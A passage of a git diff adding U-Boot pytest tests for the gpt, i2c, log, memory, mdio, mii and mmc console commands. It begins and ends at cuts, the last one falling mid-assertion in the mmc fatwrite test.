test_gpt_rename_partition(state_disk_image, u_boot_console): + """Test the gpt rename command to write partition names.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + u_boot_console.run_command('gpt rename host 0 1 first') + output = u_boot_console.run_command('gpt read host 0') + assert 'name first' in output + u_boot_console.run_command('gpt rename host 0 2 second') + output = u_boot_console.run_command('gpt read host 0') + assert 'name second' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_swap_partitions(state_disk_image, u_boot_console): + """Test the gpt swap command to exchange two partition names.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + 
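# Both partitions must still be at their original offsets before the swap +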
assert '0x00001000 0x00001bff "part2"' in output + u_boot_console.run_command('gpt swap host 0 part1 part2') + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "part2"' in output + assert '0x00001000 0x00001bff "part1"' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_set_bootable(state_disk_image, u_boot_console): + """Test the gpt set-bootable command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + parts = ('part2', 'part1') + for bootable in parts: + output = u_boot_console.run_command(f'gpt set-bootable host 0 {bootable}') + assert 'success!' in output + + for p in parts: + output = u_boot_console.run_command(f'gpt setenv host 0 {p}') + assert 'success!' in output + output = u_boot_console.run_command('echo ${gpt_partition_bootable}') + if p == bootable: + assert output.rstrip() == '1' + else: + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_write(state_disk_image, u_boot_console): + """Test the gpt write command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt write host 0 "name=all,size=0"') + assert 'Writing GPT: success!' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000022 0x00001fde "all"' in output + output = u_boot_console.run_command('gpt write host 0 "uuid_disk=375a56f7-d6c9-4e81-b5f0-09d41ca89efe;name=first,start=1M,size=1M;name=second,start=0x200000,size=0x180000;"') + assert 'Writing GPT: success!' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + output = u_boot_console.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_transpose(state_disk_image, u_boot_console): + """Test the gpt transpose command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part list host 0') + assert '1\t0x00000800\t0x00000fff\t"part1"' in output + assert '2\t0x00001000\t0x00001bff\t"part2"' in output + + output = u_boot_console.run_command('gpt transpose host 0 1 2') + assert 'success!' 
in output + + output = u_boot_console.run_command('part list host 0') + assert '2\t0x00000800\t0x00000fff\t"part1"' in output + assert '1\t0x00001000\t0x00001bff\t"part2"' in output diff --git a/test/py/tests/test_handoff.py b/test/py/tests/test_handoff.py new file mode 100644 index 00000000000..038f03064a6 --- /dev/null +++ b/test/py/tests/test_handoff.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest + +# Magic number to check that SPL handoff is working +TEST_HANDOFF_MAGIC = 0x14f93c7b + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl') +def test_handoff(u_boot_console): + """Test that of-platdata can be generated and used in sandbox""" + cons = u_boot_console + response = cons.run_command('sb handoff') + assert ('SPL handoff magic %x' % TEST_HANDOFF_MAGIC) in response diff --git a/test/py/tests/test_help.py b/test/py/tests/test_help.py new file mode 100644 index 00000000000..153133cf28f --- /dev/null +++ b/test/py/tests/test_help.py @@ -0,0 +1,34 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest + +def test_help(u_boot_console): + """Test that the "help" command can be executed.""" + + u_boot_console.run_command('help') + +@pytest.mark.boardspec('sandbox') +def test_help_no_devicetree(u_boot_console): + try: + cons = u_boot_console + cons.restart_uboot_with_flags([], use_dtb=False) + cons.run_command('help') + output = cons.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + u_boot_console.restart_uboot() + +@pytest.mark.boardspec('sandbox_vpl') +def test_vpl_help(u_boot_console): + try: + cons = u_boot_console + cons.restart_uboot() + cons.run_command('help') + output = cons.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_i2c.py b/test/py/tests/test_i2c.py new file mode 100644 index 00000000000..825d0c2e6eb --- /dev/null +++ b/test/py/tests/test_i2c.py @@ -0,0 +1,116 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the i2c device info including the bus list and eeprom address/value. This test +will be automatically skipped without this. + +For example: + +# Setup env__i2c_device_test to set the i2c bus list and probe_all boolean +# parameter. For i2c_probe_all_buses case, if probe_all parameter is set to +# False then it probes all the buses listed in bus_list instead of probing all +# the buses available. +env__i2c_device_test = { + 'bus_list': [0, 2, 5, 12, 16, 18], + 'probe_all': False, +} + +# Setup env__i2c_eeprom_device_test to set the i2c bus number, eeprom address +# and configured value for i2c_eeprom test case. 
Test will be skipped if +# env__i2c_eeprom_device_test is not set +env__i2c_eeprom_device_test = { + 'bus': 3, + 'eeprom_addr': 0x54, + 'eeprom_val': '30 31', +} +""" + +def get_i2c_test_env(u_boot_console): + f = u_boot_console.config.env.get("env__i2c_device_test", None) + if not f: + pytest.skip("No I2C device to test!") + else: + bus_list = f.get("bus_list", None) + if not bus_list: + pytest.skip("I2C bus list is not provided!") + probe_all = f.get("probe_all", False) + return bus_list, probe_all + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_bus(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = u_boot_console.run_command("i2c bus") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_dev(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + expected_response = "Current bus is" + response = u_boot_console.run_command("i2c dev") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + bus = random.choice(bus_list) + expected_response = f"Setting bus to {bus}" + response = u_boot_console.run_command(f"i2c dev {bus}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = u_boot_console.run_command("i2c probe") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_eeprom(u_boot_console): + f = u_boot_console.config.env.get("env__i2c_eeprom_device_test", None) + if not f: + pytest.skip("No I2C eeprom to test!") + + bus = f.get("bus", 0) + if bus < 0: + pytest.fail("No bus specified via env__i2c_eeprom_device_test!") + + addr = f.get("eeprom_addr", -1) + if addr < 0: + pytest.fail("No eeprom address specified via env__i2c_eeprom_device_test!") + + value = f.get("eeprom_val") + if not value: + pytest.fail( + "No eeprom configured value provided via env__i2c_eeprom_device_test!" + ) + + # Enable i2c mux bridge + u_boot_console.run_command("i2c dev %x" % bus) + u_boot_console.run_command("i2c probe") + output = u_boot_console.run_command("i2c md %x 0 5" % addr) + assert value in output + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe_all_buses(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = u_boot_console.run_command("i2c bus") + assert expected_response in response + + # Get all the bus list + if probe: + buses = re.findall("Bus (.+?):", response) + bus_list = [int(x) for x in buses] + + for dev in bus_list: + expected_response = f"Setting bus to {dev}" + response = u_boot_console.run_command(f"i2c dev {dev}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = u_boot_console.run_command("i2c probe") + assert expected_response in response diff --git a/test/py/tests/test_kconfig.py b/test/py/tests/test_kconfig.py new file mode 100644 index 00000000000..0b9e6bc3bd1 --- /dev/null +++ b/test/py/tests/test_kconfig.py @@ -0,0 +1,39 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' 
directory is not writeable +TMPDIR = '/tmp/test_kconfig' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_kconfig(u_boot_console): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + cons = u_boot_console + + # This detects build errors in test/lib/kconfig.c + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' in out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +def test_kconfig_spl(u_boot_console): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + cons = u_boot_console + + # This detects build errors in test/lib/kconfig_spl.c + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox_spl', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + + # There is no CONFIG_SPL_TEST_KCONFIG, so the CONFIG_IF_ENABLED_INT() + # line should not generate an error + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' not in out diff --git a/test/py/tests/test_log.py b/test/py/tests/test_log.py new file mode 100644 index 00000000000..140dcb9aa2b --- /dev/null +++ b/test/py/tests/test_log.py @@ -0,0 +1,48 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. +# +# U-Boot Verified Boot Test + +""" +This tests U-Boot logging. It uses the 'log test' command with various options +and checks that the output is correct. +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_log') +def test_log_format(u_boot_console): + """Test the 'log format' and 'log rec' commands""" + def run_with_format(fmt, expected_output): + """Set up the log format and then write a log record + + Args: + fmt: Format to use for 'log format' + expected_output: Expected output from the 'log rec' command + """ + output = cons.run_command('log format %s' % fmt) + assert output == '' + output = cons.run_command('log rec arch notice file.c 123 func msg') + assert output == expected_output + + cons = u_boot_console + with cons.log.section('format'): + run_with_format('all', 'NOTICE.arch,file.c:123-func() msg') + output = cons.run_command('log format') + assert output == 'Log format: clFLfm' + + run_with_format('fm', 'func() msg') + run_with_format('clfm', 'NOTICE.arch,func() msg') + run_with_format('FLfm', 'file.c:123-func() msg') + run_with_format('lm', 'NOTICE. 
msg') + run_with_format('m', 'msg') + +@pytest.mark.buildconfigspec('debug_uart') +@pytest.mark.boardspec('sandbox') +def test_log_dropped(u_boot_console): + """Test dropped 'log' message when debug_uart is activated""" + + cons = u_boot_console + cons.restart_uboot() + output = cons.get_spawn_output().replace('\r', '') + assert (not 'debug: main' in output) diff --git a/test/py/tests/test_lsblk.py b/test/py/tests/test_lsblk.py new file mode 100644 index 00000000000..a719a48e6ee --- /dev/null +++ b/test/py/tests/test_lsblk.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('blk') +@pytest.mark.buildconfigspec('cmd_lsblk') +def test_lsblk(u_boot_console): + """Test that `lsblk` prints a result which includes `host`.""" + output = u_boot_console.run_command('lsblk') + assert "Block Driver" in output + assert "sandbox_host_blk" in output diff --git a/test/py/tests/test_md.py b/test/py/tests/test_md.py new file mode 100644 index 00000000000..83e3c546f4a --- /dev/null +++ b/test/py/tests/test_md.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import u_boot_utils + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md(u_boot_console): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + + ram_base = u_boot_utils.find_ram_base(u_boot_console) + addr = '%08x' % ram_base + val = 'a5f09876' + expected_response = addr + ': ' + val + u_boot_console.run_command('mw ' + addr + ' 0 10') + response = u_boot_console.run_command('md ' + addr + ' 10') + assert(not (expected_response in response)) + u_boot_console.run_command('mw ' + addr + ' ' + val) + response = u_boot_console.run_command('md ' + addr + ' 10') + assert(expected_response in response) + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md_repeat(u_boot_console): + """Test command repeat (via executing an empty command) operates correctly + for "md"; the command must repeat and dump an incrementing address.""" + + ram_base = u_boot_utils.find_ram_base(u_boot_console) + addr_base = '%08x' % ram_base + words = 0x10 + addr_repeat = '%08x' % (ram_base + (words * 4)) + u_boot_console.run_command('md %s %x' % (addr_base, words)) + response = u_boot_console.run_command('') + expected_response = addr_repeat + ': ' + assert(expected_response in response) diff --git a/test/py/tests/test_mdio.py b/test/py/tests/test_mdio.py new file mode 100644 index 00000000000..89711e70b55 --- /dev/null +++ b/test/py/tests/test_mdio.py @@ -0,0 +1,79 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the PHY device info including the device name, address, register address/value +and write data value. This test will be automatically skipped without this. + +For example: + +# Setup env__mdio_util_test to set the PHY address, device names, register +# address, register address value, and write data value to test mdio commands. 
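+# reg_val should hold the register's existing value; the write test restores it +# after verifying that write_val was written.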
+# Test will be skipped if env_mdio_util_test is not set +env__mdio_util_test = { + "eth0": {"phy_addr": 0xc, "device_name": "TI DP83867", "reg": 0, + "reg_val": 0x1000, "write_val": 0x100}, + "eth1": {"phy_addr": 0xa0, "device_name": "TI DP83867", "reg": 1, + "reg_val": 0x2000, "write_val": 0x100}, +} +""" + +def get_mdio_test_env(u_boot_console): + f = u_boot_console.config.env.get("env__mdio_util_test", None) + if not f or len(f) == 0: + pytest.skip("No PHY device to test!") + else: + return f + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_list(u_boot_console): + f = get_mdio_test_env(u_boot_console) + output = u_boot_console.run_command("mdio list") + for dev, val in f.items(): + phy_addr = val.get("phy_addr") + dev_name = val.get("device_name") + + assert f"{phy_addr:x} -" in output + assert dev_name in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_read(u_boot_console): + f = get_mdio_test_env(u_boot_console) + output = u_boot_console.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + + output = u_boot_console.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_write(u_boot_console): + f = get_mdio_test_env(u_boot_console) + output = u_boot_console.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + wr_val = hex(val.get("write_val")) + + u_boot_console.run_command(f"mdio write {phy_addr} {reg} {wr_val}") + output = u_boot_console.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {wr_val}" in output + + u_boot_console.run_command(f"mdio write {phy_addr} {reg} {reg_val}") + output = u_boot_console.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output diff --git a/test/py/tests/test_memtest.py b/test/py/tests/test_memtest.py new file mode 100644 index 00000000000..0618d96f1be --- /dev/null +++ b/test/py/tests/test_memtest.py @@ -0,0 +1,68 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the memory test parameters such as start address, memory size, pattern, +iterations and timeout. This test will be automatically skipped without this. + +For example: + +# Setup env__memtest to set the start address of the memory range, size of the +# memory range to test from starting address, pattern to be written to memory, +# number of test iterations, and expected time to complete the test of mtest +# command. start address, size, and pattern parameters value should be in hex +# and rest of the params value should be integer. 
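+# The end address passed to mtest is derived as start_addr + size.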
+env__memtest = { + 'start_addr': 0x0, + 'size': 0x1000, + 'pattern': 0x0, + 'iteration': 16, + 'timeout': 50000, +} +""" + +def get_memtest_env(u_boot_console): + f = u_boot_console.config.env.get("env__memtest", None) + if not f: + pytest.skip("memtest is not enabled!") + else: + start = f.get("start_addr", 0x0) + size = f.get("size", 0x1000) + pattern = f.get("pattern", 0x0) + iteration = f.get("iteration", 2) + timeout = f.get("timeout", 50000) + end = hex(int(start) + int(size)) + return start, end, pattern, iteration, timeout + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_negative(u_boot_console): + """Negative test case where the end address is smaller than the start + address and the pattern is invalid.""" + start, end, pattern, iteration, timeout = get_memtest_env(u_boot_console) + expected_response = "Refusing to do empty test" + response = u_boot_console.run_command( + f"mtest 2000 1000 {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = u_boot_console.run_command("echo $?") + assert not output.endswith("0") + u_boot_console.run_command(f"mtest {start} {end} 'xyz' {hex(iteration)}") + output = u_boot_console.run_command("echo $?") + assert not output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_ddr(u_boot_console): + """Run mtest over the configured memory range and check that it completes + the requested number of iterations with 0 errors.""" + start, end, pattern, iteration, timeout = get_memtest_env(u_boot_console) + expected_response = f"Tested {str(iteration)} iteration(s) with 0 errors." + with u_boot_console.temporary_timeout(timeout): + response = u_boot_console.run_command( + f"mtest {start} {end} {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mii.py b/test/py/tests/test_mii.py new file mode 100644 index 00000000000..7b6816d1089 --- /dev/null +++ b/test/py/tests/test_mii.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test doesn't rely on boardenv_* configuration values, but they can +change the test behavior. + +For example: + +# Setup env__mii_device_test_skip to True if tests with ethernet PHY devices +# should be skipped. For example: Missing PHY device +env__mii_device_test_skip = True + +# Setup env__mii_device_test to set the MII device names.
Test will be skipped +# if env_mii_device_test is not set +env__mii_device_test = { + 'device_list': ['eth0', 'eth1'], +} +""" + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_info(u_boot_console): + if u_boot_console.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + expected_output = "PHY" + output = u_boot_console.run_command("mii info") + if not re.search(r"PHY (.+?):", output): + pytest.skip("PHY device does not exist!") + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_list(u_boot_console): + if u_boot_console.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + + f = u_boot_console.config.env.get("env__mii_device_test", None) + if not f: + pytest.skip("No MII device to test!") + + dev_list = f.get("device_list") + if not dev_list: + pytest.fail("No MII device list provided via env__mii_device_test!") + + expected_output = "Current device" + output = u_boot_console.run_command("mii device") + mii_devices = ( + re.search(r"MII devices: '(.+)'", output).groups()[0].replace("'", "").split() + ) + + assert len([x for x in dev_list if x in mii_devices]) == len(dev_list) + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_set_device(u_boot_console): + test_mii_list(u_boot_console) + f = u_boot_console.config.env.get("env__mii_device_test", None) + dev_list = f.get("device_list") + output = u_boot_console.run_command("mii device") + current_dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + + for dev in dev_list: + u_boot_console.run_command(f"mii device {dev}") + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") + + u_boot_console.run_command(f"mii device {current_dev}") + output = u_boot_console.run_command("mii device") + dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + assert current_dev == dev + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_read(u_boot_console): + test_mii_list(u_boot_console) + output = u_boot_console.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + u_boot_console.run_command(f"mii read {eth_addr} 0") + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_dump(u_boot_console): + test_mii_list(u_boot_console) + expected_response = "PHY control register" + output = u_boot_console.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + response = u_boot_console.run_command(f"mii dump {eth_addr} 0") + assert expected_response in response + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mmc.py b/test/py/tests/test_mmc.py new file mode 100644 index 00000000000..a96c4e8fd89 --- /dev/null +++ b/test/py/tests/test_mmc.py @@ -0,0 +1,671 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import u_boot_utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test MMC file system cases (fat32, ext2, ext4), +MMC device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the MMC device is not detected. 
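+Partition types are detected from the 'mmc part' output: types 0b/0c/0e are +treated as FAT and type 83 as ext2/ext4.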
+ +For example: + +# Setup env__mmc_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for MMC device. +env__mmc_device_test_skip = False +""" + +mmc_set_up = False +controllers = 0 +devices = {} + +def setup_mmc(u_boot_console): + if u_boot_console.config.env.get('env__mmc_device_test_skip', True): + pytest.skip('MMC device test is not enabled') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_list(u_boot_console): + setup_mmc(u_boot_console) + output = u_boot_console.run_command('mmc list') + if 'No MMC device available' in output: + pytest.skip('No SD/MMC/eMMC controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No SD/MMC card present') + + array = output.split() + global devices + global controllers + controllers = int(len(array) / 2) + for x in range(0, controllers): + y = x * 2 + devices[x] = {} + devices[x]['name'] = array[y] + + global mmc_set_up + mmc_set_up = True + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + fail = 0 + for x in range(0, controllers): + devices[x]['detected'] = 'yes' + output = u_boot_console.run_command('mmc dev %d' % x) + + # Some sort of switch here + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'no mmc device at slot' in output: + devices[x]['detected'] = 'no' + + if 'MMC: no card present' in output: + devices[x]['detected'] = 'no' + + if fail: + pytest.fail('Card not present') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmcinfo(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + output = u_boot_console.run_command('mmcinfo') + if 'busy timeout' in output: + pytest.skip('No SD/MMC/eMMC device present') + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + devices[x]['capacity'] = capacity + print('Capacity of dev %d is: %g GiB' % (x, capacity)) + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + + output = u_boot_console.run_command('mmc info') + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + if devices[x]['capacity'] != capacity: + pytest.fail("MMC capacity doesn't match mmcinfo") + + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + output = u_boot_console.run_command('mmc rescan') + if output: + pytest.fail('mmc rescan has something to check') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_part(u_boot_console): + if not mmc_set_up: + pytest.skip('No 
SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + output = u_boot_console.run_command('mmc part') + + lines = output.split('\n') + part_fat = [] + part_ext = [] + for line in lines: + obj = re.search( + r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type in ['0c', '0b', '0e']: + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext detected') + part_ext.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % x) + devices[x]['ext4'] = part_ext + devices[x]['ext2'] = part_ext + devices[x]['fat'] = part_fat + + if not part_ext and not part_fat: + pytest.fail('No partition detected on device %d' % x) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +def test_mmc_fatls_fatinfo(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + output = u_boot_console.run_command( + 'fatls mmc %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper(), x)) + output = u_boot_console.run_command( + 'fatinfo mmc %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper() + if not re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fatload_fatwrite(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + devices[x]['addr_%d' % part] = addr + size = random.randint(4, 1 * 1024 * 1024) + devices[x]['size_%d' % part] = size + # count CRC32 + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + devices[x]['expected_crc32_%d' % part] = expected_crc32 + # do write + file = '%s_%d' % ('uboot_test', size) + devices[x]['file_%d' % part] = file + output = u_boot_console.run_command( + '%swrite mmc %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in
